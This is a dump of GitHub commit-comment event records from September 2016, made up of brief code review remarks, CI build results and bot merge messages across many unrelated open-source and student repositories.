{"id":"4597997129","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19118155,"position":null,"line":null,"path":null,"commit_id":"1a65085eeb3985415881c34ce7762e8cb03f2deb","created_at":"2016-09-21T18:15:45Z","updated_at":"2016-09-21T18:15:45Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1765 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a65085eeb3985415881c34ce7762e8cb03f2deb-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1a65085eeb3985415881c34ce7762e8cb03f2deb-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T18:15:45Z"}
{"id":"4597998761","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"bpresser123/blocitoff"},"payload":{"comment":{"id":19118159,"position":10,"line":9,"path":"db/seeds.rb","commit_id":"124d61b36d12f187588ad48bf224c3ecf63c8cc8","created_at":"2016-09-21T18:16:02Z","updated_at":"2016-09-21T18:16:02Z","body":"Add a line here:\r\n\r\n```\r\nusers = User.all\r\n```"}},"created_at":"2016-09-21T18:16:02Z"}
{"id":"4597999766","type":"CommitCommentEvent","actor":{"login":"juolgon"},"repo":{"name":"BlurredSoftware/BSWFoundation"},"payload":{"comment":{"id":19118163,"position":null,"line":null,"path":null,"commit_id":"8187e73c79d291ca3d597a72b74e404d7eba7e47","created_at":"2016-09-21T18:16:12Z","updated_at":"2016-09-21T18:16:12Z","body":"Muy grande el commit 👍 "}},"created_at":"2016-09-21T18:16:12Z"}
{"id":"4598001644","type":"CommitCommentEvent","actor":{"login":"blakejohnson"},"repo":{"name":"BBN-Q/QGL"},"payload":{"comment":{"id":19118170,"position":null,"line":null,"path":null,"commit_id":"a2be5718e954050e36d4be3d782d99b7319c6a57","created_at":"2016-09-21T18:16:34Z","updated_at":"2016-09-21T18:16:34Z","body":"@dieris was it you?"}},"created_at":"2016-09-21T18:16:34Z"}
{"id":"4598001799","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"bpresser123/blocitoff"},"payload":{"comment":{"id":19118172,"position":16,"line":13,"path":"db/seeds.rb","commit_id":"124d61b36d12f187588ad48bf224c3ecf63c8cc8","created_at":"2016-09-21T18:16:35Z","updated_at":"2016-09-21T18:16:35Z","body":"Change to:\r\n\r\n```\r\nname: Faker::Lorem.words(4),\r\nuser: users.sample\r\n```"}},"created_at":"2016-09-21T18:16:35Z"}
{"id":"4598003440","type":"CommitCommentEvent","actor":{"login":"tlimpanont"},"repo":{"name":"part-up/part-up"},"payload":{"comment":{"id":19118177,"position":null,"line":null,"path":null,"commit_id":"bab951cb406ad07ab6d2a581f52dfb94720bea54","created_at":"2016-09-21T18:16:52Z","updated_at":"2016-09-21T18:16:52Z","body":"Good job! @ralphboeije @stefanlemmen "}},"created_at":"2016-09-21T18:16:52Z"}
{"id":"4598004488","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"bpresser123/blocitoff"},"payload":{"comment":{"id":19118181,"position":20,"line":12,"path":"db/seeds.rb","commit_id":"124d61b36d12f187588ad48bf224c3ecf63c8cc8","created_at":"2016-09-21T18:17:04Z","updated_at":"2016-09-21T18:17:04Z","body":"I would leave this kind of stuff in. "}},"created_at":"2016-09-21T18:17:04Z"}
{"id":"4598006614","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"bpresser123/blocitoff"},"payload":{"comment":{"id":19118192,"position":null,"line":null,"path":null,"commit_id":"124d61b36d12f187588ad48bf224c3ecf63c8cc8","created_at":"2016-09-21T18:17:26Z","updated_at":"2016-09-21T18:17:26Z","body":"You're close - made a few comments. "}},"created_at":"2016-09-21T18:17:26Z"}
{"id":"4598010223","type":"CommitCommentEvent","actor":{"login":"YeeThao"},"repo":{"name":"YeeThao/yeethao-CSCI20-FALL2016"},"payload":{"comment":{"id":19118203,"position":26,"line":26,"path":"Lab8/lab8.cpp","commit_id":"bb77cb5c662b99a12247fa24fbb78fe2c1ac3f1a","created_at":"2016-09-21T18:18:02Z","updated_at":"2016-09-21T18:18:02Z","body":"Let's the user decide which conversion they want to do depending on the input of either 1 or 2."}},"created_at":"2016-09-21T18:18:02Z"}
{"id":"4598013099","type":"CommitCommentEvent","actor":{"login":"raghavmittal101"},"repo":{"name":"kmanojkumar/Jagrit-Vinit-Jeel-Mansi-Manoj"},"payload":{"comment":{"id":19118219,"position":null,"line":null,"path":null,"commit_id":"cf54c6cedd59178d415bba983cf22b41b835b1b3","created_at":"2016-09-21T18:18:32Z","updated_at":"2016-09-21T18:18:32Z","body":"## Nice copying of document layout format.\r\n@kmanojkumar "}},"created_at":"2016-09-21T18:18:32Z"}
{"id":"4598017438","type":"CommitCommentEvent","actor":{"login":"YeeThao"},"repo":{"name":"YeeThao/yeethao-CSCI20-FALL2016"},"payload":{"comment":{"id":19118233,"position":28,"line":28,"path":"Lab8/lab8.cpp","commit_id":"bb77cb5c662b99a12247fa24fbb78fe2c1ac3f1a","created_at":"2016-09-21T18:19:19Z","updated_at":"2016-09-21T18:19:19Z","body":"If input is 1 then program will initiate converting pounds to kilograms. If input is not 1 then program will initiate converting kilograms to pounds."}},"created_at":"2016-09-21T18:19:19Z"}
{"id":"4598023987","type":"CommitCommentEvent","actor":{"login":"athoszxz"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":19118247,"position":null,"line":null,"path":null,"commit_id":"0d570a506a1b51f5333c7741c47e714d55c35ab2","created_at":"2016-09-21T18:20:27Z","updated_at":"2016-09-21T18:20:27Z","body":"abhijitbhongle use this line before:  assert rootView != null;\r\n\r\nAnd Clean e Rebuild the project."}},"created_at":"2016-09-21T18:20:27Z"}
{"id":"4598027812","type":"CommitCommentEvent","actor":{"login":"marine1vane"},"repo":{"name":"marine1vane/DVTrading"},"payload":{"comment":{"id":19118259,"position":4,"line":6,"path":"ConstructStockDataFrame.007.R","commit_id":"86b200596d4bd2968735b637dcc077f601b8de8b","created_at":"2016-09-21T18:21:06Z","updated_at":"2016-09-21T18:21:06Z","body":"okay"}},"created_at":"2016-09-21T18:21:06Z"}
{"id":"4598030062","type":"CommitCommentEvent","actor":{"login":"marine1vane"},"repo":{"name":"marine1vane/DVTrading"},"payload":{"comment":{"id":19118265,"position":5,"line":6,"path":"ConstructStockDataFrame.007.R","commit_id":"86b200596d4bd2968735b637dcc077f601b8de8b","created_at":"2016-09-21T18:21:29Z","updated_at":"2016-09-21T18:21:29Z","body":"okay same as above"}},"created_at":"2016-09-21T18:21:29Z"}
{"id":"4598030728","type":"CommitCommentEvent","actor":{"login":"satukark"},"repo":{"name":"TheSoftwareFactory/experiment-server"},"payload":{"comment":{"id":19118267,"position":42,"line":42,"path":"experiment_server/views/configurationkeys.py","commit_id":"f385370c5abc095fee8b93829ed699385b7ba578","created_at":"2016-09-21T18:21:36Z","updated_at":"2016-09-21T18:21:36Z","body":"You're right. Must change url (-> first one) to write exact text to log."}},"created_at":"2016-09-21T18:21:36Z"}
{"id":"4598030969","type":"CommitCommentEvent","actor":{"login":"stcheng"},"repo":{"name":"Azure/sonic-swss"},"payload":{"comment":{"id":19118268,"position":6,"line":23,"path":"orchagent/portsorch.h","commit_id":"159728a4e1fc5e2fb05d04ba85cd99a6df0fab66","created_at":"2016-09-21T18:21:39Z","updated_at":"2016-09-21T18:21:39Z","body":"resolved"}},"created_at":"2016-09-21T18:21:39Z"}
{"id":"4598035604","type":"CommitCommentEvent","actor":{"login":"marine1vane"},"repo":{"name":"marine1vane/DVTrading"},"payload":{"comment":{"id":19118281,"position":19,"line":20,"path":"ConstructStockDataFrame.007.R","commit_id":"86b200596d4bd2968735b637dcc077f601b8de8b","created_at":"2016-09-21T18:22:28Z","updated_at":"2016-09-21T18:22:28Z","body":"This looks like it will fail, so removing it is okay"}},"created_at":"2016-09-21T18:22:28Z"}
{"id":"4598039515","type":"CommitCommentEvent","actor":{"login":"marine1vane"},"repo":{"name":"marine1vane/DVTrading"},"payload":{"comment":{"id":19118299,"position":45,"line":41,"path":"ConstructStockDataFrame.007.R","commit_id":"86b200596d4bd2968735b637dcc077f601b8de8b","created_at":"2016-09-21T18:23:09Z","updated_at":"2016-09-21T18:23:09Z","body":"reduce the size of the array"}},"created_at":"2016-09-21T18:23:09Z"}
{"id":"4598041017","type":"CommitCommentEvent","actor":{"login":"marine1vane"},"repo":{"name":"marine1vane/DVTrading"},"payload":{"comment":{"id":19118302,"position":null,"line":null,"path":null,"commit_id":"86b200596d4bd2968735b637dcc077f601b8de8b","created_at":"2016-09-21T18:23:25Z","updated_at":"2016-09-21T18:23:25Z","body":"Lets see if I can accept this"}},"created_at":"2016-09-21T18:23:25Z"}
{"id":"4598048633","type":"CommitCommentEvent","actor":{"login":"KJEM"},"repo":{"name":"KJEM/qbb2016-answers"},"payload":{"comment":{"id":19118319,"position":null,"line":null,"path":null,"commit_id":"579d74990f18f5a0f76bd55300eb3260999850ac","created_at":"2016-09-21T18:24:44Z","updated_at":"2016-09-21T18:24:44Z","body":"Accidentally said first set of reads, this is for the second set of reads (higher reads)"}},"created_at":"2016-09-21T18:24:44Z"}
{"id":"4598049113","type":"CommitCommentEvent","actor":{"login":"ostera"},"repo":{"name":"mccain/dotfiles"},"payload":{"comment":{"id":19118323,"position":null,"line":null,"path":null,"commit_id":"66a97be8a83b48d5bf94636b8cf7c82c98d2135d","created_at":"2016-09-21T18:24:49Z","updated_at":"2016-09-21T18:24:49Z","body":"Steak sauce!"}},"created_at":"2016-09-21T18:24:49Z"}
{"id":"4598052421","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118336,"position":66,"line":66,"path":"app/controllers/main-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:25:25Z","updated_at":"2016-09-21T18:25:25Z","body":"Зачем искать индекс и потом по нему обращаться? Можно же просто\r\n```\r\n\t\t\t$http.put(API + 'items/' + item.id, item);\r\n\t\t\titem.archived = false;\r\n```"}},"created_at":"2016-09-21T18:25:25Z"}
{"id":"4598055661","type":"CommitCommentEvent","actor":{"login":"NBruderman"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":19118347,"position":null,"line":null,"path":null,"commit_id":"a63f3a3b09fae2a9dfe330fd7fbde1b158686eff","created_at":"2016-09-21T18:26:00Z","updated_at":"2016-09-21T18:26:00Z","body":"The chat message limiter cap is not being applied anymore (and cannot be set)"}},"created_at":"2016-09-21T18:26:00Z"}
{"id":"4598058155","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118351,"position":48,"line":48,"path":"app/controllers/main-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:26:27Z","updated_at":"2016-09-21T18:26:27Z","body":"👍 за использование some"}},"created_at":"2016-09-21T18:26:27Z"}
{"id":"4598060079","type":"CommitCommentEvent","actor":{"login":"doctapp"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19118353,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-21T18:26:47Z","updated_at":"2016-09-21T18:26:47Z","body":"Would be very helpful for maintaining a Spark 1.6 branch as many of the enterprise software stacks still use Spark 1.6. Tx"}},"created_at":"2016-09-21T18:26:47Z"}
{"id":"4598067662","type":"CommitCommentEvent","actor":{"login":"MichaelChirico"},"repo":{"name":"Rdatatable/data.table"},"payload":{"comment":{"id":19118372,"position":27,"line":68,"path":"R/IDateTime.R","commit_id":"908be890f9e99f0f51a27eb42f2014ca853c7bac","created_at":"2016-09-21T18:28:07Z","updated_at":"2016-09-21T18:28:07Z","body":"Shall I remove #1839?"}},"created_at":"2016-09-21T18:28:07Z"}
{"id":"4598074683","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118387,"position":34,"line":34,"path":"app/controllers/main-controller.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:29:19Z","updated_at":"2016-09-21T18:29:19Z","body":"Можно убрать лишнее и сократь метод до\r\n```\r\n\t\t\t$scope.selected = !$scope.selected;\r\n\t\t\t$scope.mainArray.forEach(function(item) {\r\n\t\t\t\titem.selected = $scope.selected;\r\n\t\t\t});\r\n```"}},"created_at":"2016-09-21T18:29:19Z"}
{"id":"4598082527","type":"CommitCommentEvent","actor":{"login":"dhermes"},"repo":{"name":"GoogleCloudPlatform/google-cloud-python"},"payload":{"comment":{"id":19118406,"position":null,"line":null,"path":null,"commit_id":"d71dcb6839aa6e113dbaaf575468a59d9e102969","created_at":"2016-09-21T18:30:38Z","updated_at":"2016-09-21T18:30:38Z","body":"Ouch. Thanks for the change."}},"created_at":"2016-09-21T18:30:38Z"}
{"id":"4598082614","type":"CommitCommentEvent","actor":{"login":"TheMolkaPL"},"repo":{"name":"stanfordconcertnetwork/stanfordconcertnetwork.github.io"},"payload":{"comment":{"id":19118407,"position":5,"line":46,"path":"_layouts/default.html","commit_id":"12db13cf10139aa2c8a40b720c894763398bb453","created_at":"2016-09-21T18:30:38Z","updated_at":"2016-09-21T18:30:38Z","body":"I can't access it."}},"created_at":"2016-09-21T18:30:38Z"}
{"id":"4598084262","type":"CommitCommentEvent","actor":{"login":"lguohan"},"repo":{"name":"opencomputeproject/SAI"},"payload":{"comment":{"id":19118410,"position":4,"line":336,"path":"inc/saibuffer.h","commit_id":"8e3a8a76a25379920004b37fb29c2458edb0aeba","created_at":"2016-09-21T18:30:53Z","updated_at":"2016-09-21T18:30:53Z","body":"@gmirek , XOFF_TH is defines the threshold that compares the available buffer in the PG, it can be treated as the headroom size. I think here XOFF_TH is not what you mean here."}},"created_at":"2016-09-21T18:30:53Z"}
{"id":"4598087644","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118419,"position":12,"line":12,"path":"app/directives/header/header.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:31:27Z","updated_at":"2016-09-21T18:31:27Z","body":"Можно сделать ссылку на logout и завершать сессию в роутере при переходе по данному урлу."}},"created_at":"2016-09-21T18:31:27Z"}
{"id":"4598089658","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-product-formatter"},"payload":{"comment":{"id":19118427,"position":32,"line":633,"path":"raw_binary/format_conversion_libs/espa_geoloc.c","commit_id":"5a66533fbc63f246f32fa5077f94a73480e32797","created_at":"2016-09-21T18:31:47Z","updated_at":"2016-09-21T18:31:47Z","body":"Should these two if else be in an else section of the ascending test?  Just to be safe that the meridian_crossing is not set by the descending tests."}},"created_at":"2016-09-21T18:31:47Z"}
{"id":"4598089829","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":19118428,"position":null,"line":null,"path":null,"commit_id":"cb3a29fb67936c2bc52b1cfee08cedab62950282","created_at":"2016-09-21T18:31:48Z","updated_at":"2016-09-21T18:31:48Z","body":"In that case, definitely seems like a cleaner implementation than before to me. :)"}},"created_at":"2016-09-21T18:31:48Z"}
{"id":"4598090610","type":"CommitCommentEvent","actor":{"login":"cdysthe"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19118429,"position":null,"line":null,"path":null,"commit_id":"62b93afbecf09ceee2db01a9465c787769d6280d","created_at":"2016-09-21T18:31:57Z","updated_at":"2016-09-21T18:31:57Z","body":"Whew! I was so afraid this was the new Numix! :) This fix will work on all DEs affected?"}},"created_at":"2016-09-21T18:31:57Z"}
{"id":"4598094587","type":"CommitCommentEvent","actor":{"login":"andy-maier"},"repo":{"name":"tasleson/libstoragemgmt"},"payload":{"comment":{"id":19118440,"position":29,"line":43,"path":"plugin/smispy/WBEM.py","commit_id":"90d6df4e5a640fb7035114c36d90bc8c189f8db5","created_at":"2016-09-21T18:32:38Z","updated_at":"2016-09-21T18:32:38Z","body":"@tasleson Tony, pywbem has its `Error` and `AuthError` exception classes available in the `pywbem` namespace in all of its versions since 0.8. So importing these classes from `pywbem` is the right thing to do and in no version of pywbem since 0.8 should you have a need to handle an `ImportError` by falling back to importing them from `pywbem.cim_http`.\r\n\r\npywbem 0.7 did not have these two classes in the `pywbem` namespace yet. Do you really need to cover for someone still using pywbem 0.7?"}},"created_at":"2016-09-21T18:32:38Z"}
{"id":"4598095833","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118444,"position":10,"line":10,"path":"app/factories/authorization-factory.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:32:51Z","updated_at":"2016-09-21T18:32:51Z","body":"Не нужно делать редиректы в сервисе. Сделать лучше возвращать деферед объект."}},"created_at":"2016-09-21T18:32:51Z"}
{"id":"4598102712","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":19118450,"position":17,"line":17,"path":"app/factories/authorization-factory.js","commit_id":"055f157e940a97b3fc9f0f33310a117ad70f3f0d","created_at":"2016-09-21T18:33:59Z","updated_at":"2016-09-21T18:33:59Z","body":"`return storage.getItem('user');`\r\nА вообще хорошо бы добавить минимальную проверку на то, что в storage существует инфа о пользователе и сравнивать ее с теми данными, что хранятся в константах."}},"created_at":"2016-09-21T18:33:59Z"}
{"id":"4598104230","type":"CommitCommentEvent","actor":{"login":"yunboouyang"},"repo":{"name":"yunboouyang/EBestimator"},"payload":{"comment":{"id":19118457,"position":null,"line":null,"path":null,"commit_id":"9c611ad7b96f52a7531fb0632714e865078f21cc","created_at":"2016-09-21T18:34:15Z","updated_at":"2016-09-21T18:34:15Z","body":"Simulation 1 code and results added"}},"created_at":"2016-09-21T18:34:15Z"}
{"id":"4598109124","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":19118464,"position":10,"line":10,"path":"_posts/plotly2/2019-09-21-shareplot-viewer-in-plotly2.md","commit_id":"a29cbfc28ebda7585e3f1fd36fd7d98c4c0d6628","created_at":"2016-09-21T18:35:09Z","updated_at":"2016-09-21T18:35:09Z","body":"hmm this is more related to https://plot.ly/ in general right, rather than Plotly 2.0? I'd remove the in 2.0"}},"created_at":"2016-09-21T18:35:09Z"}
{"id":"4598109943","type":"CommitCommentEvent","actor":{"login":"Glebka"},"repo":{"name":"lenapy/Spider"},"payload":{"comment":{"id":19118469,"position":10,"line":21,"path":"avitopars/avitopars/spiders/avito_spider.py","commit_id":"3abedc814b4f7e835ca4c70d736c64d343ecc4a8","created_at":"2016-09-21T18:35:17Z","updated_at":"2016-09-21T18:35:17Z","body":"Please, write comments in English. It will help you to learn common IT terms. Also, it is common practice for open source projects."}},"created_at":"2016-09-21T18:35:17Z"}
{"id":"4598110334","type":"CommitCommentEvent","actor":{"login":"cldougl"},"repo":{"name":"plotly/plotly.github.io"},"payload":{"comment":{"id":19118470,"position":13,"line":13,"path":"_posts/plotly2/2019-09-21-shareplot-viewer-in-plotly2.md","commit_id":"a29cbfc28ebda7585e3f1fd36fd7d98c4c0d6628","created_at":"2016-09-21T18:35:21Z","updated_at":"2016-09-21T18:35:21Z","body":"same"}},"created_at":"2016-09-21T18:35:21Z"}
{"id":"4598110526","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118471,"position":24,"line":40,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:35:23Z","updated_at":"2016-09-21T18:35:23Z","body":"I was wondering about that"}},"created_at":"2016-09-21T18:35:23Z"}
{"id":"4598120031","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19118487,"position":null,"line":null,"path":null,"commit_id":"a1b7121e5f5c210d82cc1ad0e692aa0f0db2177f","created_at":"2016-09-21T18:37:03Z","updated_at":"2016-09-21T18:37:03Z","body":"saw approval from javajolt\nat https://github.com/basho/riak_core/commit/a1b7121e5f5c210d82cc1ad0e692aa0f0db2177f"}},"created_at":"2016-09-21T18:37:03Z"}
{"id":"4598120062","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19118489,"position":null,"line":null,"path":null,"commit_id":"a1b7121e5f5c210d82cc1ad0e692aa0f0db2177f","created_at":"2016-09-21T18:37:03Z","updated_at":"2016-09-21T18:37:03Z","body":"merging basho/riak_core/feature-bjs-lager3.2.1 = a1b7121e into borshop-integration-862-feature-bjs-lager3.2.1"}},"created_at":"2016-09-21T18:37:03Z"}
{"id":"4598120083","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":19118490,"position":null,"line":null,"path":null,"commit_id":"a1b7121e5f5c210d82cc1ad0e692aa0f0db2177f","created_at":"2016-09-21T18:37:04Z","updated_at":"2016-09-21T18:37:04Z","body":"basho/riak_core/feature-bjs-lager3.2.1 = a1b7121e merged ok, testing candidate = 8403d623"}},"created_at":"2016-09-21T18:37:04Z"}
{"id":"4598120568","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19118493,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T18:37:09Z","updated_at":"2016-09-21T18:37:09Z","body":"Thete is a recovery log here but it is 6 days old.\r\n\r\nhttps://www.dropbox.com/s/763uy1z88384jvf/recovery_N_b4boot.log?dl=0\r\n\r\nI can also get a new log if you prefer."}},"created_at":"2016-09-21T18:37:09Z"}
{"id":"4598121438","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118495,"position":40,"line":56,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:37:18Z","updated_at":"2016-09-21T18:37:18Z","body":"Nice!"}},"created_at":"2016-09-21T18:37:18Z"}
{"id":"4598123439","type":"CommitCommentEvent","actor":{"login":"jb3-2"},"repo":{"name":"StataBS/indikatoren"},"payload":{"comment":{"id":19118500,"position":null,"line":null,"path":null,"commit_id":"5b4e7b3b16c7104dd47431c8efbc979860bf64cc","created_at":"2016-09-21T18:37:39Z","updated_at":"2016-09-21T18:37:39Z","body":"Das geht so nicht - je nach Browser ist die Zeile unterschiedlich lang. Bitte den HTML Tag &shy; verwenden statt '-'. Shy heisst Soft Hyphen, siehe [hier](https://wiki.selfhtml.org/wiki/HTML/Textauszeichnung/br)\r\n\r\n@JE1982 Kannst Du das von Vitus anpassen lassen? "}},"created_at":"2016-09-21T18:37:39Z"}
{"id":"4598124338","type":"CommitCommentEvent","actor":{"login":"ashanhol"},"repo":{"name":"MachUpskillingFY17/JabbR-Core"},"payload":{"comment":{"id":19118505,"position":null,"line":null,"path":null,"commit_id":"442e130d58e9d780c2e6142638bffdb2d05adb55","created_at":"2016-09-21T18:37:48Z","updated_at":"2016-09-21T18:37:48Z","body":"#44: debugging"}},"created_at":"2016-09-21T18:37:48Z"}
{"id":"4598129165","type":"CommitCommentEvent","actor":{"login":"andy-maier"},"repo":{"name":"tasleson/libstoragemgmt"},"payload":{"comment":{"id":19118517,"position":28,"line":42,"path":"plugin/smispy/WBEM.py","commit_id":"90d6df4e5a640fb7035114c36d90bc8c189f8db5","created_at":"2016-09-21T18:38:42Z","updated_at":"2016-09-21T18:38:42Z","body":"@tasleson Tony, The `CIMError` class in pywbem supports accessing its two init arguments by index (and by slice) since pywbem 0.7. I just verified that for 0.7.0, 0.8.4, 0.9.0 and the 0.10 dev version. So there is no need to monkey patch the `__getitem__()` of `CIMError` at all. Also, your monkey patching only works for pywbem 0.9 and higher, because pywbem did not have the exceptions module before 0.9."}},"created_at":"2016-09-21T18:38:42Z"}
{"id":"4598130086","type":"CommitCommentEvent","actor":{"login":"mykmelez"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19118520,"position":null,"line":null,"path":null,"commit_id":"46799e7206736db0e03b7ce6f6dc9e30fadd5fd7","created_at":"2016-09-21T18:38:51Z","updated_at":"2016-09-21T18:38:51Z","body":"> N * 60 * 60 should be a familiar pattern. The 3 underscores the hour.\r\n\r\nIndeed, I've used it before elsewhere.\r\n\r\n> I mean, where else do you compute that product?\r\n\r\nIn Positron, I think we do so in just the two places in this file. It's possible there are others, however.\r\n\r\nIn an imperative context, I'd embed the calculation as an expression, which makes explicit both the calculation and what it represents:\r\n\r\n```js\r\n  maxRunTime: 3 * 60 * 60, // seconds (i.e. three hours)\r\n```\r\n\r\nIn this declarative context, however, I can't do that.\r\n"}},"created_at":"2016-09-21T18:38:51Z"}
{"id":"4598131261","type":"CommitCommentEvent","actor":{"login":"colemickens"},"repo":{"name":"lmazuel/azure-sdk-for-python"},"payload":{"comment":{"id":19118525,"position":5,"line":2169,"path":"azure-servicemanagement-legacy/tests/test_legacy_mgmt_misc.py","commit_id":"2e905a99993e9c5631cc28fa09fb837bb19067c3","created_at":"2016-09-21T18:39:05Z","updated_at":"2016-09-21T18:39:05Z","body":"Does that actually catch cases where the field is unpopulated? I would have assumed that `len(None)` would have blown up in the previous version of the test code.\r\n\r\nFor example, why `assertIsNotNone` instead of `assertGreater`  than zero list is done for the `publisher_name` which is also a string field?"}},"created_at":"2016-09-21T18:39:05Z"}
{"id":"4598140651","type":"CommitCommentEvent","actor":{"login":"Isapour"},"repo":{"name":"Dogfalo/materialize"},"payload":{"comment":{"id":19118558,"position":null,"line":null,"path":null,"commit_id":"8301f867c1c2c84c0f01b0859d1a1ce4b7ae52d1","created_at":"2016-09-21T18:40:39Z","updated_at":"2016-09-21T18:40:39Z","body":"how can i create right to left side-nav?"}},"created_at":"2016-09-21T18:40:39Z"}
{"id":"4598140780","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118559,"position":126,"line":126,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:40:41Z","updated_at":"2016-09-21T18:40:41Z","body":"sure"}},"created_at":"2016-09-21T18:40:41Z"}
{"id":"4598143745","type":"CommitCommentEvent","actor":{"login":"andy-maier"},"repo":{"name":"tasleson/libstoragemgmt"},"payload":{"comment":{"id":19118566,"position":23,"line":37,"path":"plugin/smispy/WBEM.py","commit_id":"90d6df4e5a640fb7035114c36d90bc8c189f8db5","created_at":"2016-09-21T18:41:16Z","updated_at":"2016-09-21T18:41:16Z","body":"On \"# older versions don't have pywbem.Error & pywbem.AuthError\": More specifically, v0.7.0 of pywbem did not have them. All versions since 0.8.0 do have them.\r\n"}},"created_at":"2016-09-21T18:41:16Z"}
{"id":"4598146003","type":"CommitCommentEvent","actor":{"login":"jvandg"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19118571,"position":89,"line":99,"path":"2016-02/content/Ward.tex","commit_id":"f05c5971df7c79817f8ec8e713814563d5f86511","created_at":"2016-09-21T18:41:41Z","updated_at":"2016-09-21T18:41:41Z","body":"good to know"}},"created_at":"2016-09-21T18:41:41Z"}
{"id":"4598146709","type":"CommitCommentEvent","actor":{"login":"vacary"},"repo":{"name":"siconos/siconos"},"payload":{"comment":{"id":19118575,"position":null,"line":null,"path":null,"commit_id":"c918475f23b84c7c24ac3f49959b28ccd0833245","created_at":"2016-09-21T18:41:48Z","updated_at":"2016-09-21T18:41:48Z","body":"Yes , we have to suppress it. Hope there no other one"}},"created_at":"2016-09-21T18:41:48Z"}
{"id":"4598146821","type":"CommitCommentEvent","actor":{"login":"ohinckel"},"repo":{"name":"smarthomeNG/smarthome"},"payload":{"comment":{"id":19118576,"position":6,"line":165,"path":"plugins/backend/locale/de.json","commit_id":"c3e223c1c64bb68ee39a76f54d3209357fbd76b3","created_at":"2016-09-21T18:41:49Z","updated_at":"2016-09-21T18:41:49Z","body":"I suggest to use \"neu laden\" or \"neuladen\"."}},"created_at":"2016-09-21T18:41:49Z"}
{"id":"4598147114","type":"CommitCommentEvent","actor":{"login":"zonkzonk"},"repo":{"name":"zonkzonk/radare2"},"payload":{"comment":{"id":19118580,"position":4,"line":1473,"path":"libr/debug/p/native/linux/linux_coredump.c","commit_id":"cbb87b810a5cf8d6178af56bd0825e42b0df228f","created_at":"2016-09-21T18:41:53Z","updated_at":"2016-09-21T18:41:53Z","body":"yes. need new pr? :p"}},"created_at":"2016-09-21T18:41:53Z"}
